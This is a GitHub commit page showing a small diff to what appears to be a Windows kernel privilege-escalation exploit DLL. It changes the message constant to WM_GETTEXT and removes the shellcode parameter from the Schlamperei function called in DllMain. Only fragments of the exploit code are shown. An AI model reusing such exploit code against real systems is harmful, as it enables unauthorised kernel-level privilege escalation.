Skip to content

Commit

Permalink
Merge pull request #2 from Meatballs1/pr3090
Browse files Browse the repository at this point in the history
Address OJ's comments
  • Loading branch information
kyuz0 committed May 2, 2014
2 parents 8126fd1 + 850f6b0 commit d9ad78e
Showing 1 changed file with 3 additions and 3 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,7 @@ typedef NTSTATUS *PNTSTATUS;

#define TABLE_BASE 0xff910000

#define EXPLOIT_MSG 0xd
#define EXPLOIT_MSG WM_GETTEXT

// global variables FTW
HWND gHwnd = 0x0;
Expand Down Expand Up @@ -231,7 +231,7 @@ typedef long (*_RtlCreateUserThread)(HANDLE,

_RtlCreateUserThread RtlCreateUserThread;

int Schlamperei(LPVOID shellcode)
int Schlamperei()
{
// Create window which will execute the wndproc in kernel mode
HWND wnd = createhelperwnd();
Expand Down Expand Up @@ -278,7 +278,7 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
}
break;
case DLL_PROCESS_ATTACH:
Schlamperei(lpReserved);
Schlamperei();
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
Expand Down

0 comments on commit d9ad78e

Please sign in to comment.